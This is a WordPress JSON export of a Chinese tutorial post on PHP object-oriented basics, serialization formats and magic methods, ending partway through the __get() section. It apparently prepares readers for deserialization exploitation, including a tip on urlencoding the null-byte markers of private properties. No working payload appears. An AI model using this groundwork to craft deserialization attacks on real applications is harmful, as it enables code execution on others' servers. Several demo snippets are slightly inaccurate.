{"id":67,"date":"2026-01-22T23:14:39","date_gmt":"2026-01-22T15:14:39","guid":{"rendered":"https:\/\/zhihao.org.cn\/?p=67"},"modified":"2026-01-22T23:40:35","modified_gmt":"2026-01-22T15:40:35","slug":"%e6%b7%b1%e5%85%a5%e6%8e%a2%e7%b4%a2-php-%e5%8f%8d%e5%ba%8f%e5%88%97%e5%8c%96%e4%b8%8e%e9%ad%94%e6%9c%af%e6%96%b9%e6%b3%95","status":"publish","type":"post","link":"https:\/\/zhihao.org.cn\/?p=67","title":{"rendered":"\u6df1\u5165\u63a2\u7d22 PHP \u53cd\u5e8f\u5217\u5316\u4e0e\u9b54\u672f\u65b9\u6cd5"},"content":{"rendered":"\n<h3 class=\"wp-block-heading\" id=\"kOpjv\"><strong>\u7c7b\u4e0e\u5bf9\u8c61<\/strong><\/h3>\n\n\n\n<h4 class=\"wp-block-heading\" id=\"yZZZ4\">php\u9762\u5411\u5bf9\u8c61\u5f00\u53d1\u7684\u5185\u5bb9<\/h4>\n\n\n\n<p id=\"ue0718492\"><strong>\u7c7b<\/strong> \u2212 \u5b9a\u4e49\u4e86\u4e00\u4ef6\u4e8b\u7269\u7684\u62bd\u8c61\u7279\u70b9\u3002\u7c7b\u7684\u5b9a\u4e49\u5305\u542b\u4e86\u6570\u636e\u7684\u5f62\u5f0f\u4ee5\u53ca\u5bf9\u6570\u636e\u7684\u64cd\u4f5c\u3002<\/p>\n\n\n\n<p id=\"u5ac17eb8\"><strong>\u5bf9\u8c61<\/strong> \u2212 \u662f\u7c7b\u7684\u5b9e\u4f8b\u3002<\/p>\n\n\n\n<p id=\"ue47b95b9\"><strong>\u6210\u5458\u53d8\u91cf<\/strong> \u2212 \u5b9a\u4e49\u5728\u7c7b\u5185\u90e8\u7684\u53d8\u91cf\u3002\u8be5\u53d8\u91cf\u7684\u503c\u5bf9\u5916\u662f\u4e0d\u53ef\u89c1\u7684\uff0c\u4f46\u662f\u53ef\u4ee5\u901a\u8fc7\u6210\u5458\u51fd\u6570\u8bbf\u95ee\uff0c\u5728\u7c7b\u88ab\u5b9e\u4f8b\u5316\u4e3a\u5bf9\u8c61\u540e\uff0c\u8be5\u53d8\u91cf\u5373\u53ef\u6210\u4e3a\u5bf9\u8c61\u7684\u5c5e\u6027\u3002<\/p>\n\n\n\n<p id=\"u097b0387\"><strong>\u6210\u5458\u51fd\u6570<\/strong> \u2212 \u5b9a\u4e49\u5728\u7c7b\u7684\u5185\u90e8\uff0c\u53ef\u7528\u4e8e\u8bbf\u95ee\u5bf9\u8c61\u7684\u6570\u636e\u3002<\/p>\n\n\n\n<p id=\"uff02d78f\"><strong>\u7ee7\u627f<\/strong> \u2212 \u7ee7\u627f\u6027\u662f\u5b50\u7c7b\u81ea\u52a8\u5171\u4eab\u7236\u7c7b\u6570\u636e\u7ed3\u6784\u548c\u65b9\u6cd5\u7684\u673a\u5236\uff0c\u8fd9\u662f\u7c7b\u4e4b\u95f4\u7684\u4e00\u79cd\u5173\u7cfb\u3002\u5728\u5b9a\u4e49\u548c\u5b9e\u73b0\u4e00\u4e2a\u7c7b\u7684\u65f6\u5019\uff0c\u53ef\u4ee5\u5728\u4e00\u4e2a\u5df2\u7ecf\u5b58\u5728\u7684\u7c7b\u7684\u57fa\u7840\u4e4b\u4e0a\u6765\u8fdb\u884c\uff0c\u628a\u8fd9\u4e2a\u5df2\u7ecf\u5b58\u5728\u7684\u7c7b\u6240\u5b9a\u4e49\u7684\u5185\u5bb9\u4f5c\u4e3a\u81ea\u5df1\u7684\u5185\u5bb9\uff0c\u5e76\u52a0\u5165\u82e5\u5e72\u65b0\u7684\u5185\u5bb9\u3002<\/p>\n\n\n\n<p id=\"u207b0a61\"><strong>\u7236\u7c7b<\/strong> \u2212 \u4e00\u4e2a\u7c7b\u88ab\u5176\u4ed6\u7c7b\u7ee7\u627f\uff0c\u53ef\u5c06\u8be5\u7c7b\u79f0\u4e3a\u7236\u7c7b\uff0c\u6216\u57fa\u7c7b\uff0c\u6216\u8d85\u7c7b\u3002<\/p>\n\n\n\n<p id=\"u40a1826b\"><strong>\u5b50\u7c7b<\/strong> \u2212 \u4e00\u4e2a\u7c7b\u7ee7\u627f\u5176\u4ed6\u7c7b\u79f0\u4e3a\u5b50\u7c7b\uff0c\u4e5f\u53ef\u79f0\u4e3a\u6d3e\u751f\u7c7b\u3002<\/p>\n\n\n\n<p id=\"uff580e90\"><strong>\u6784\u9020\u51fd\u6570<\/strong> \u2212 \u4e3b\u8981\u7528\u6765\u5728\u521b\u5efa\u5bf9\u8c61\u65f6\u521d\u59cb\u5316\u5bf9\u8c61\uff0c \u5373\u4e3a\u5bf9\u8c61\u6210\u5458\u53d8\u91cf\u8d4b\u521d\u59cb\u503c\uff0c\u603b\u4e0enew\u8fd0\u7b97\u7b26\u4e00\u8d77\u4f7f\u7528\u5728\u521b\u5efa\u5bf9\u8c61\u7684\u8bed\u53e5\u4e2d\u3002<\/p>\n\n\n\n<p id=\"u8bf99cea\"><strong>\u6790\u6784\u51fd\u6570<\/strong> \u2212 \u6790\u6784\u51fd\u6570(destructor) \u4e0e\u6784\u9020\u51fd\u6570\u76f8\u53cd\uff0c\u5f53\u5bf9\u8c61\u7ed3\u675f\u5176\u751f\u547d\u5468\u671f\u65f6\uff08\u4f8b\u5982\u5bf9\u8c61\u6240\u5728\u7684\u51fd\u6570\u5df2\u8c03\u7528\u5b8c\u6bd5\uff09\uff0c\u7cfb\u7edf\u81ea\u52a8\u6267\u884c\u6790\u6784\u51fd\u6570\u3002\u6790\u6784\u51fd\u6570\u5f80\u5f80\u7528\u6765\u505a&#8221;\u6e05\u7406\u5584\u540e&#8221; \u7684\u5de5\u4f5c\uff08\u4f8b\u5982\u5728\u5efa\u7acb\u5bf9\u8c61\u65f6\u7528new\u5f00\u8f9f\u4e86\u4e00\u7247\u5185\u5b58\u7a7a\u95f4\uff0c\u5e94\u5728\u9000\u51fa\u524d\u5728\u6790\u6784\u51fd\u6570\u4e2d\u7528delete\u91ca\u653e\uff09\u3002<\/p>\n\n\n\n<h4 class=\"wp-block-heading\" id=\"BCpGm\">\u7c7b\u7684\u6f14\u793a<\/h4>\n\n\n\n<p id=\"uaff9aca3\">\u7c7b\uff1a\u5b9a\u4e49\u7c7b\u540d\u3001\u5b9a\u4e49\u6210\u5458\u53d8\u91cf\uff08\u5c5e\u6027\uff09\u3001\u5b9a\u4e49\u6210\u5458\u51fd\u6570\uff08\u65b9\u6cd5<\/p>\n\n\n\n<pre id=\"H5uBW\" class=\"wp-block-code\"><code>&lt;?php\nclass hero{\n  var $name;\n  var $sex;\n  function jineng($var1) {\n    echo $this-&gt;name;\n    echo $var1;\n  }\n}\n?&gt;<\/code><\/pre>\n\n\n\n<h4 class=\"wp-block-heading\" id=\"DYtov\">\u5b9e\u4f8b\u5316\u548c\u8d4b\u503c<\/h4>\n\n\n\n<p id=\"u518c72ef\">\u5b9e\u4f8b\u5316\u548c\u8d4b\u503c\uff0c\u6f14\u793a\u4ee3\u7801<\/p>\n\n\n\n<pre id=\"rfNyh\" class=\"wp-block-code\"><code>&lt;?php\nclass hero{\n  var $name;\n  var $sex;\n  function jineng($var1) {\n    echo $this-&gt;name.\"&lt;br \/&gt;\";\n    echo $var1.\"&lt;br \/&gt;\";\n    }\n}\n$cyj= new hero();\n$cyj-&gt;name='chengyaojin';\n$cyj-&gt;sex='man';\n$cyj-&gt;jineng('zuofan');\nprint_r($cyj);\n?&gt;\n&lt;!-- chengyaojin\nzuofan\nhero Object ( &#91;name] =&gt; chengyaojin &#91;sex] =&gt; man )\t \t\t\t --&gt;<\/code><\/pre>\n\n\n\n<h4 class=\"wp-block-heading\" id=\"uwXBN\">\u6743\u9650\u4fee\u9970\u7b26<\/h4>\n\n\n\n<p id=\"u2816ab5e\">PHP\u8bbf\u95ee\u6743\u9650\u4fee\u9970\u7b26\u6709\u4e09\u79cd\uff1a1\u3001Public\uff0c2\u3001Protected\uff0c3\u3001private<\/p>\n\n\n\n<pre id=\"k2lnK\" class=\"wp-block-code\"><code>&lt;?php\nclass hero{\n  public  $name='chengyaojin'; \/\/public\u4fee\u9970\u7b26\u662fPHP\u4e2d\u6700\u5e38\u7528\u7684\u6743\u9650\u63a7\u5236\u4fee\u9970\u7b26\uff0c\u7528\u4e8e\u63cf\u8ff0\u516c\u5171\u6210\u5458\u53d8\u91cf\u548c\u6210\u5458\u65b9\u6cd5\u3002\u5c06\u4e00\u4e2a\u6210\u5458\u53d8\u91cf\u6216\u65b9\u6cd5\u5b9a\u4e49\u4e3a\u516c\u5171\u7684\uff0c\u5219\u4efb\u4f55\u5bf9\u8c61\u90fd\u53ef\u4ee5\u8bbf\u95ee\u8be5\u53d8\u91cf\u6216\u65b9\u6cd5\u3002\n  private  $sex='man'; \/\/private\u4fee\u9970\u7b26\u7528\u4e8e\u63cf\u8ff0\u79c1\u6709\u7684\u6210\u5458\u53d8\u91cf\u548c\u6210\u5458\u65b9\u6cd5\u3002\u5c06\u4e00\u4e2a\u6210\u5458\u53d8\u91cf\u6216\u65b9\u6cd5\u5b9a\u4e49\u4e3a\u79c1\u6709\u7684\uff0c\u5219\u53ea\u6709\u8be5\u7c7b\u5185\u90e8\u53ef\u4ee5\u8bbf\u95ee\u8fd9\u4e9b\u6210\u5458\u3002\n  protected  $shengao='165';  \/\/protected\u4fee\u9970\u7b26\u7528\u4e8e\u63cf\u8ff0\u53d7\u4fdd\u62a4\u7684\u6210\u5458\u53d8\u91cf\u548c\u6210\u5458\u65b9\u6cd5\u3002\u5c06\u4e00\u4e2a\u6210\u5458\u53d8\u91cf\u6216\u65b9\u6cd5\u5b9a\u4e49\u4e3a\u53d7\u4fdd\u62a4\u7684\uff0c\u5219\u53ea\u6709\u5b50\u7c7b\u548c\u7236\u7c7b\u4e2d\u53ef\u4ee5\u8bbf\u95ee\u8fd9\u4e9b\u6210\u5458\u3002\n  function jineng($var1) {\n    echo $this-&gt;name;\n    echo $var1;\n    }\n}\n$cyj= new hero();\necho $cyj-&gt;name.\"&lt;br \/&gt;\";\necho $cyj-&gt;sex.\"&lt;br \/&gt;\";\necho $cyj-&gt;shengao.\"&lt;br \/&gt;\";\n?&gt;\n\n&lt;!-- chengyaojin --&gt;<\/code><\/pre>\n\n\n\n<h3 class=\"wp-block-heading\" id=\"vWoeR\"><strong>\u5e8f\u5217\u5316\u57fa\u7840\u77e5\u8bc6<\/strong><\/h3>\n\n\n\n<h4 class=\"wp-block-heading\" id=\"mQZUk\">\u5e8f\u5217\u5316\u6f14\u793a<\/h4>\n\n\n\n<p id=\"u049255b3\">\u4e0d\u540c\u6570\u636e\u7c7b\u578b\u5e8f\u5217\u5316\u4e4b\u540e\u5bf9\u7684\u683c\u5f0f\u5c55\u793a<\/p>\n\n\n\n<p id=\"u699554cd\">\u5bf9\u8c61\u7c7b\u578b:\u540d\u79f0\u957f\u5ea6:\u5bf9\u8c61\u540d\u79f0:\u5bf9\u8c61\u4e2a\u6570:{\u5c5e\u6027\u7c7b\u578b:\u5c5e\u6027\u957f\u5ea6:\u5c5e\u6027\u540d\u79f0;\u5185\u5bb9\u7c7b\u578b:\u5185\u5bb9\u957f\u5ea6:\u5185\u5bb9;}<\/p>\n\n\n\n<pre id=\"uCRo1\" class=\"wp-block-code\"><code>&lt;?php\nclass TEST {\n    public $data;\n    public $data2 = \"dazzhuang\";\n    private $pass;\n\n    public function __construct($data, $pass)\n    {\n        $this-&gt;data = $data;\n        $this-&gt;pass = $pass;\n    }\n}\n$number = 34;\n$str = 'user';\n$bool = true;\n$null = NULL;\n$arr = array('a' =&gt; 10, 'b' =&gt; 200);\n$test = new TEST('uu', true);\n$test2 = new TEST('uu', true);\n$test2-&gt;data = &amp;$test2-&gt;data2;\necho serialize($number).\"&lt;br \/&gt;\";\necho serialize($str).\"&lt;br \/&gt;\";\necho serialize($bool).\"&lt;br \/&gt;\";\necho serialize($null).\"&lt;br \/&gt;\";\necho serialize($arr).\"&lt;br \/&gt;\";\necho serialize($test).\"&lt;br \/&gt;\";\necho serialize($test2).\"&lt;br \/&gt;\";\n?&gt;\n&lt;!-- \ni:34;\ns:4:\"user\";\nb:1;\nN;\na:2:{s:1:\"a\";i:10;s:1:\"b\";i:200;}\nO:4:\"TEST\":3:{s:4:\"data\";s:2:\"uu\";s:5:\"data2\";s:9:\"dazzhuang\";s:10:\"TESTpass\";b:1;}\nO:4:\"TEST\":3:{s:4:\"data\";s:9:\"dazzhuang\";s:5:\"data2\";R:2;s:10:\"TESTpass\";b:1;} --&gt;<\/code><\/pre>\n\n\n\n<h4 class=\"wp-block-heading\" id=\"yTJr0\">\u6570\u7ec4\u5e8f\u5217\u5316<\/h4>\n\n\n\n<pre id=\"u0u87\" class=\"wp-block-code\"><code>&lt;?php\n$a = array('benben','dazhuang','laoliu');\necho $a&#91;0];\necho serialize($a);\n?&gt;\n&lt;!-- benbena:3:{i:0;s:6:\"benben\";i:1;s:8:\"dazhuang\";i:2;s:6:\"laoliu\";} --&gt;<\/code><\/pre>\n\n\n\n<h4 class=\"wp-block-heading\" id=\"WUNb8\">\u5bf9\u8c61\u5e8f\u5217\u5316<\/h4>\n\n\n\n<p id=\"uf47fc3f5\">\u63d0\u4f9b\u4e86\u5bf9\u8c61\u5e8f\u5217\u5316\u793a\u4f8b<\/p>\n\n\n\n<pre id=\"iZQtx\" class=\"wp-block-code\"><code>&lt;?php\nhighlight_file(__FILE__);\nclass test{\n    public $pub='benben';\n    function jineng(){\n        echo $this-&gt;pub;\n    }\n}\n$a = new test();\necho serialize($a);\n?&gt;\n&lt;!-- O:4:\"test\":1:{s:3:\"pub\";s:6:\"benben\";} --&gt;<\/code><\/pre>\n\n\n\n<h4 class=\"wp-block-heading\" id=\"QdF8h\">\u79c1\u6709\u4fee\u9970\u7b26 private<\/h4>\n\n\n\n<p id=\"u8ee711ee\">\u79c1\u6709\u5c5e\u6027\u5728\u5e8f\u5217\u5316\u4e4b\u540e\u7684\u683c\u5f0f<\/p>\n\n\n\n<pre id=\"MlQbA\" class=\"wp-block-code\"><code>&lt;?php\nclass test{\n    private $pub='benben';\n    function jineng(){\n        echo $this-&gt;pub;\n    }\n}\n$a = new test();\necho serialize($a);\n?&gt;\n&lt;!-- O:4:\"test\":1:{s:9:\"testpub\";s:6:\"benben\";} --&gt;\n&lt;!-- \u5f53\u5c5e\u6027\u53d8\u91cf\u4e3aprivate\u548cprotected\u65f6\uff0c\u6700\u597d\u4f7f\u7528urlencode\u52a0\u5bc6\u4e00\u4e0b\uff0c\u4f1a\u5728\u5c5e\u6027\u540d\u79f0\u524d\u751f\u6210\u4e0d\u53ef\u89c1\u5b57\u7b26--&gt;<\/code><\/pre>\n\n\n\n<p id=\"u804e41bf\">private\u53cd\u5e8f\u5217\u5316\u540e\u662f%00(\u7c7b\u540d)%00(\u53d8\u91cf\u540d)<\/p>\n\n\n\n<h4 class=\"wp-block-heading\" id=\"kWjYF\">\u4fdd\u62a4\u4fee\u9970\u7b26 protected<\/h4>\n\n\n\n<p id=\"u81b91926\">\u4fdd\u62a4\u5c5e\u6027\u4fee\u9970\u7b26\u5728\u5e8f\u5217\u5316\u4e4b\u540e\u7684\u683c\u5f0f<\/p>\n\n\n\n<pre id=\"ydjvz\" class=\"wp-block-code\"><code>&lt;?php\nclass test{\n    protected $pub='benben';\n    function jineng(){\n        echo $this-&gt;pub;\n    }\n}\n$a = new test();\necho serialize($a);\n?&gt;\n&lt;!-- O:4:\"test\":1:{s:6:\"*pub\";s:6:\"benben\";} --&gt;<\/code><\/pre>\n\n\n\n<p id=\"u3493252d\">protect\u5e8f\u5217\u5316\u4e4b\u540e\u662f%00*%00(\u53d8\u91cf\u540d<\/p>\n\n\n\n<h4 class=\"wp-block-heading\" id=\"SJu90\">\u6210\u5458\u5c5e\u6027\u8c03\u7528\u5bf9\u8c61<\/h4>\n\n\n\n<p id=\"u75b9b000\">\u6f14\u793a\u6210\u5458\u5c5e\u6027\u8c03\u7528\u5bf9\u8c61\u8fc7\u7a0b\uff0c\u53ca\u5e8f\u5217\u5316\u4e4b\u540e\u683c\u5f0f\u89e3\u91ca<\/p>\n\n\n\n<pre id=\"A9ShY\" class=\"wp-block-code\"><code>&lt;?php\nclass test{\n    var $pub='benben';\n    function jineng(){\n        echo $this-&gt;pub;\n    }\n}\nclass test2{\n    var $ben;\n    function __construct(){\n        $this-&gt;ben=new test();\n    }\n}\n$a = new test2();\necho serialize($a);\n?&gt;\n&lt;!-- O:5:\"test2\":1:{s:3:\"ben\";O:4:\"test\":1:{s:3:\"pub\";s:6:\"benben\";}} --&gt;<\/code><\/pre>\n\n\n\n<h3 class=\"wp-block-heading\" id=\"sGZTz\"><strong>\u9b54\u672f\u65b9\u6cd5\u4ecb\u7ecd\uff0c\u6784\u9020\u548c\u6790\u6784<\/strong><\/h3>\n\n\n\n<p id=\"u1d0e8c08\">PHP\u4e2d\u628a\u4ee5\u4e24\u4e2a\u4e0b\u5212\u7ebf__\u5f00\u5934\u7684\u65b9\u6cd5\u79f0\u4e3a\u9b54\u672f\u65b9\u6cd5(Magic methods)\uff0c\u8fd9\u4e9b\u65b9\u6cd5\u5728PHP\u4e2d\u5145\u5f53\u4e86\u4e3e\u8db3\u8f7b\u91cd\u7684\u4f5c\u7528\u3002 \u9b54\u672f\u65b9\u6cd5\u5305\u62ec\uff1a<\/p>\n\n\n\n<pre id=\"iK1Jf\" class=\"wp-block-code\"><code>__construct()\uff0c\u7c7b\u7684\u6784\u9020\u51fd\u6570\n\n__destruct()\uff0c\u7c7b\u7684\u6790\u6784\u51fd\u6570\n\n__call()\uff0c\u5728\u5bf9\u8c61\u4e2d\u8c03\u7528\u4e00\u4e2a\u4e0d\u53ef\u8bbf\u95ee\u65b9\u6cd5\u65f6\u8c03\u7528\n\n__callStatic()\uff0c\u7528\u9759\u6001\u65b9\u5f0f\u4e2d\u8c03\u7528\u4e00\u4e2a\u4e0d\u53ef\u8bbf\u95ee\u65b9\u6cd5\u65f6\u8c03\u7528\n\n__get()\uff0c\u83b7\u5f97\u4e00\u4e2a\u7c7b\u7684\u6210\u5458\u53d8\u91cf\u65f6\u8c03\u7528\n\n__set()\uff0c\u8bbe\u7f6e\u4e00\u4e2a\u7c7b\u7684\u6210\u5458\u53d8\u91cf\u65f6\u8c03\u7528\n\n__isset()\uff0c\u5f53\u5bf9\u4e0d\u53ef\u8bbf\u95ee\u5c5e\u6027\u8c03\u7528isset()\u6216empty()\u65f6\u8c03\u7528\n\n__unset()\uff0c\u5f53\u5bf9\u4e0d\u53ef\u8bbf\u95ee\u5c5e\u6027\u8c03\u7528unset()\u65f6\u88ab\u8c03\u7528\u3002\n\n__sleep()\uff0c\u6267\u884cserialize()\u65f6\uff0c\u5148\u4f1a\u8c03\u7528\u8fd9\u4e2a\u51fd\u6570\n\n__wakeup()\uff0c\u6267\u884cunserialize()\u65f6\uff0c\u5148\u4f1a\u8c03\u7528\u8fd9\u4e2a\u51fd\u6570\n\n__toString()\uff0c\u7c7b\u88ab\u5f53\u6210\u5b57\u7b26\u4e32\u65f6\u7684\u56de\u5e94\u65b9\u6cd5\n\n__invoke()\uff0c\u8c03\u7528\u51fd\u6570\u7684\u65b9\u5f0f\u8c03\u7528\u4e00\u4e2a\u5bf9\u8c61\u65f6\u7684\u56de\u5e94\u65b9\u6cd5\n\n__set_state()\uff0c\u8c03\u7528var_export()\u5bfc\u51fa\u7c7b\u65f6\uff0c\u6b64\u9759\u6001\u65b9\u6cd5\u4f1a\u88ab\u8c03\u7528\u3002\n\n__clone()\uff0c\u5f53\u5bf9\u8c61\u590d\u5236\u5b8c\u6210\u65f6\u8c03\u7528\n\n__autoload()\uff0c\u5c1d\u8bd5\u52a0\u8f7d\u672a\u5b9a\u4e49\u7684\u7c7b\n\n__debugInfo()\uff0c\u6253\u5370\u6240\u9700\u8c03\u8bd5\u4fe1\u606f<\/code><\/pre>\n\n\n\n<h4 class=\"wp-block-heading\" id=\"REwLi\">__construct()<\/h4>\n\n\n\n<p id=\"u537eedad\">\u6784\u9020\u51fd\u6570\uff0c\u5728\u5b9e\u4f8b\u5316\u4e00\u4e2a\u5bf9\u8c61\u7684\u65f6\u5019\uff0c\u9996\u5148\u4f1a\u53bb\u81ea\u52a8\u6267\u884c\u7684\u4e00\u4e2a\u65b9\u6cd5\uff0c\u5f53\u4f7f\u7528 new \u5173\u952e\u5b57\u5b9e\u4f8b\u5316\u4e00\u4e2a\u5bf9\u8c61\u65f6\uff0c\u6784\u9020\u51fd\u6570\u5c06\u4f1a\u81ea\u52a8\u8c03\u7528\u3002\uff1b<\/p>\n\n\n\n<pre id=\"djld0\" class=\"wp-block-code\"><code>&lt;?php\nclass User {\n    public $username;\n    public function __construct($username) {\n        $this-&gt;username = $username;\n        echo \"\u89e6\u53d1\u4e86\u6784\u9020\u51fd\u65701\u6b21\" ;\n    }\n}\n$test = new User(\"benben\"); \/\/\u8fd9\u91cc\u89e6\u53d1\n$ser = serialize($test);\nunserialize($ser);\n\n?&gt;\n\n&lt;!-- \u89e6\u53d1\u4e86\u6784\u9020\u51fd\u65701\u6b21 --&gt;<\/code><\/pre>\n\n\n\n<h4 class=\"wp-block-heading\" id=\"EHivb\">__destruct()<\/h4>\n\n\n\n<p id=\"u7cd541f4\">\u6790\u6784\u51fd\u6570\uff0c\u5728\u5bf9\u8c61\u7684\u6240\u6709\u5f15\u7528\u88ab\u5220\u9664\u6216\u8005\u5f53\u5bf9\u8c61\u88ab\u663e\u5f0f\u9500\u6bc1\u65f6\u6267\u884c\u7684\u9b54\u672f\u65b9\u6cd5\u3002<\/p>\n\n\n\n<pre id=\"Qx5GC\" class=\"wp-block-code\"><code>&lt;?php\nclass User {\n    public function __destruct()\n    {\n        echo \"\u89e6\u53d1\u4e86\u6790\u6784\u51fd\u65701\u6b21\".\"&lt;br \/&gt;\" ;\n    }\n}\n$test = new User(\"benben\");\n$ser = serialize($test);\nunserialize($ser); \n\/\/\u8fd9\u91cc\u89e6\u53d1\n\n?&gt;\n&lt;!-- \u89e6\u53d1\u4e86\u6790\u6784\u51fd\u65701\u6b21\n\u89e6\u53d1\u4e86\u6790\u6784\u51fd\u65701\u6b21 --&gt;<\/code><\/pre>\n\n\n\n<h4 class=\"wp-block-heading\" id=\"lcqix\">__sleep()<\/h4>\n\n\n\n<p id=\"ue004915c\">\u6b64\u529f\u80fd\u53ef\u4ee5\u7528\u4e8e\u6e05\u7406\u5bf9\u8c61\uff0c\u5e76\u8fd4\u56de\u4e00\u4e2a\u5305\u542b\u5bf9\u8c61\u4e2d\u6240\u6709\u5e94\u88ab\u5e8f\u5217\u5316\u7684\u53d8\u91cf\u540d\u79f0\u7684\u6570\u7ec4\u3002\u6267\u884cserialize()\u4e4b\u524d\uff0c\u5148\u4f1a\u89e6\u53d1\u8fd9\u4e2a\u51fd\u6570,session\u5e8f\u5217\u5316\u5199\u5165\u65f6\u4f1a\u89e6\u53d1<\/p>\n\n\n\n<pre id=\"gRLAO\" class=\"wp-block-code\"><code>&lt;?php\nclass User {\n    const SITE = 'uusama';\n    public $username;\n    public $nickname;\n    private $password;\n    public function __construct($username, $nickname, $password)    {\n        $this-&gt;username = $username;\n        $this-&gt;nickname = $nickname;\n        $this-&gt;password = $password;\n    }\n    public function __sleep() {\n        return array('username', 'nickname');\n    }\n}\n$user = new User('a', 'b', 'c');\n\/\/\u8fd9\u91cc\u89e6\u53d1\necho serialize($user);\n?&gt;\n\n&lt;!-- O:4:\"User\":2:{s:8:\"username\";s:1:\"a\";s:8:\"nickname\";s:1:\"b\";} --&gt;<\/code><\/pre>\n\n\n\n<h4 class=\"wp-block-heading\" id=\"aO8PH\">__wakeup()<\/h4>\n\n\n\n<p id=\"u351176a2\">\u9884\u5148\u51c6\u5907\u5bf9\u8c61\u8d44\u6e90\uff0c\u8fd4\u56devoid\uff0c\u5e38\u7528\u4e8e\u53cd\u5e8f\u5217\u5316\u64cd\u4f5c\u4e2d\u91cd\u65b0\u5efa\u7acb\u6570\u636e\u5e93\u8fde\u63a5\u6216\u6267\u884c\u5176\u4ed6\u521d\u59cb\u5316\u64cd\u4f5c\u3002\u6267\u884cunserialize()\u65f6\uff0c\u5148\u4f1a\u8c03\u7528\u8fd9\u4e2a\u51fd\u6570<\/p>\n\n\n\n<pre id=\"LcG6t\" class=\"wp-block-code\"><code>&lt;?php\nclass User {\n    const SITE = 'uusama';\n    public $username;\n    public $nickname;\n    private $password;\n    private $order;\n    public function __wakeup() {\n        $this-&gt;password = $this-&gt;username;\n    }\n}\n$user_ser = 'O:4:\"User\":2:{s:8:\"username\";s:1:\"a\";s:8:\"nickname\";s:1:\"b\";}';\n\/\/\u8fd9\u91cc\u89e6\u53d1\nvar_dump(unserialize($user_ser));\n?&gt;\n&lt;!-- object(User)#1 (4) { &#91;\"username\"]=&gt; string(1) \"a\" &#91;\"nickname\"]=&gt; string(1) \"b\" &#91;\"password\":\"User\":private]=&gt; string(1) \"a\" &#91;\"order\":\"User\":private]=&gt; NULL } --&gt;<\/code><\/pre>\n\n\n\n<h4 class=\"wp-block-heading\" id=\"GWwxk\">__toString()<\/h4>\n\n\n\n<p id=\"u80cdd3fd\">echo\u6216\u8005print\u53ea\u80fd\u8c03\u7528\u5b57\u7b26\u4e32\u7684\u65b9\u5f0f\u53bb\u8c03\u7528\u5bf9\u8c61\uff0c\u5373\u628a\u5bf9\u8c61\u5f53\u6210\u5b57\u7b26\u4e32\u4f7f\u7528\uff0c\u6b64\u65f6\u81ea\u52a8\u89e6\u53d1toString()\u3002\u628a\u7c7b\u5f53\u4f5c\u5b57\u7b26\u4e32\u4f7f\u7528\u65f6\u89e6\u53d1 echo\uff0c\u6b63\u5219\u5339\u914d\uff0c\u5b57\u7b26\u4e32\u62fc\u63a5\u7b49\u90fd\u4f1a\u89e6\u53d1<\/p>\n\n\n\n<pre id=\"dFPEd\" class=\"wp-block-code\"><code>&lt;?php\nclass User {\n    var $benben = \"this is test!!\";\n         public function __toString()\n         {\n             return '\u683c\u5f0f\u4e0d\u5bf9\uff0c\u8f93\u51fa\u4e0d\u4e86!';\n          }\n}\n$test = new User() ;\nprint_r($test);\necho \"&lt;br \/&gt;\";\necho $test; \/\/\u8fd9\u91cc\u89e6\u53d1\n?&gt;\n&lt;!-- User Object ( &#91;benben] =&gt; this is test!! )\n\u683c\u5f0f\u4e0d\u5bf9\uff0c\u8f93\u51fa\u4e0d\u4e86! --&gt;<\/code><\/pre>\n\n\n\n<h4 class=\"wp-block-heading\" id=\"j6bD5\">__invoke()<\/h4>\n\n\n\n<p id=\"u11fcd024\">\u628atest\u5f53\u6210\u51fd\u6570test()\u6765\u8c03\u7528,\u6b64\u65f6\u89e6\u53d1invoke()\u3002\u5f53\u5c1d\u8bd5\u5c06\u5bf9\u8c61\u8c03\u7528\u4e3a\u51fd\u6570\u65f6\u89e6\u53d1<\/p>\n\n\n\n<pre id=\"txe6g\" class=\"wp-block-code\"><code>&lt;?php\nclass User {\n    var $benben = \"this is test!!\";\n         public function __invoke()\n         {\n             echo  '\u5b83\u4e0d\u662f\u4e2a\u51fd\u6570!';\n          }\n}\n$test = new User() ;\necho $test -&gt;benben;\necho \"&lt;br \/&gt;\";\necho $test() -&gt;benben;\/\/\u8fd9\u91cc\u89e6\u53d1\n?&gt;\nthis is test!!\n\u5b83\u4e0d\u662f\u4e2a\u51fd\u6570!<\/code><\/pre>\n\n\n\n<h4 class=\"wp-block-heading\" id=\"g5sTG\">__call()<\/h4>\n\n\n\n<p id=\"u48db3b18\">\u8c03\u7528\u7684\u4e0d\u5b58\u5728\u7684\u65b9\u6cd5\u7684\u540d\u79f0\u548c\u53c2\u6570\uff0c\u5728\u5bf9\u8c61\u4e0a\u4e0b\u6587\u4e2d\u8c03\u7528\u4e0d\u53ef\u8bbf\u95ee\u7684\u65b9\u6cd5\u65f6\u89e6\u53d1 #$test-&gt;callxxx(&#8216;a&#8217;);<\/p>\n\n\n\n<pre id=\"FoSdE\" class=\"wp-block-code\"><code>&lt;?php\nclass User {\n    public function __call($arg1,$arg2)\n    {\n        echo \"$arg1,$arg2&#91;0]\";\n          }\n}\n$test = new User() ;\n$test -&gt; callxxx('a');\n?&gt;\n\n&lt;!-- callxxx,a --&gt;<\/code><\/pre>\n\n\n\n<h4 class=\"wp-block-heading\" id=\"ZIK4h\">__callStatic()<\/h4>\n\n\n\n<p id=\"u730d0e4d\">\u9759\u6001\u8c03\u7528\u6216\u8c03\u7528\u6210\u5458\u5e38\u91cf\u65f6\u4f7f\u7528\u7684\u65b9\u6cd5\u4e0d\u5b58\u5728\uff0c\u5728\u9759\u6001\u4e0a\u4e0b\u6587\u4e2d\u8c03\u7528\u4e0d\u53ef\u8bbf\u95ee\u7684\u65b9\u6cd5\u65f6\u89e6\u53d1 #$test::callxxx(&#8216;a&#8217;);<\/p>\n\n\n\n<pre id=\"vJv4q\" class=\"wp-block-code\"><code>&lt;?php\nclass User {\n    public function __callStatic($arg1,$arg2)\n    {\n        echo \"$arg1,$arg2&#91;0]\";\n          }\n}\n$test = new User() ;\n$test::callxxx('a');\n?&gt;\n\n&lt;!-- callxxx,a --&gt;<\/code><\/pre>\n\n\n\n<h4 class=\"wp-block-heading\" id=\"gIpxw\">__get()<\/h4>\n\n\n\n<p id=\"u254769d8\">\u8c03\u7528\u7684\u6210\u5458\u5c5e\u6027\u4e0d\u5b58\u5728\u3002__get() 